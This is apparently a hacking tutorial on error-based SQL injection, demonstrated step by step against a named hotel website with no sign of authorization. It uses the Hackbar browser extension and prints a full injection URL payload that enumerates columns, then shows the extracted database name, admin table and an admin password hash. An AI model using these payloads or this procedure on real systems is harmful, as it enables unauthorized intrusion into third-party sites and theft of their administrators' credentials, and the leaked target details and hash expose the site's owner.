Error Based SQL Injection

We mainly use ​error base SQL injection​ when we do not access any website admin by manual SQL injection or WAF Bypass.

I recommend using Firefox Hackebar extension for Error base SQL injection, There is a part in ​hackbar ​like ERROR/DOUBLE .it will make our error base SQL injection procedure easier.

Our target site is: ​http://www.embryohotel.com/room-detail.php?id=11

Step 1​: First add string(‘) to check is the site is vulnerable or not. My target site is Vulnerable because using the sting the content of the page is changed and it shows some message.

Step2​: No following manual SQL injection or Union base SQL injection try to find out a vulnerable column. In my target site, it shows an error message.

Step 3​: Let's try WAF Bypass, but in my target site, its also not work. So we need to use Error base SQL infection.

Step4​: We need to find out the database name, So click this way in firefox hackbar extension,

ERROR/DOUBLE -> Error Based -> Get Database

We get the Database name: cp227754_embryohotel_db

Step 5​: find out the admin/required Table, So click this way in firefox hackbar extension,

ERROR/DOUBLE -> Error Based -> Get Tables

We get the Table name: admin

Step 6​: find out the Columns,So click this way in firefox hackbar extension, ERROR/DOUBLE -> Error Based -> Get Columns

We get the Column name: username, password

Note: if there are multiple columns then change the limit and re-run , then it will also show the different columns. Like: http://www.embryohotel.com/room-detail.php?id=-11+AND+​(SELECT+1+FROM+(SELECT+C OUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+I NFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e+AND+table_sche ma=0x63703232373735345f656d6272796f686f74656c5f6462+​LIMIT+1,1​),FLOOR(RAND(0)* 2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) — —

Increment 1,2,3,4…….

Step 7​: Now find out data from this two-column(username, password) ,So click this way in firefox hackbar extension,

​ ​ERROR/DOUBLE -> Error Based -> XPATH EXTRACTVALUE ->Get Data

We get admin username and password(hashed):

admin => e742c63f03ab602f2b38433ffc

— — — — — — — — — — — -Happy Hacking — — — — — — — — — —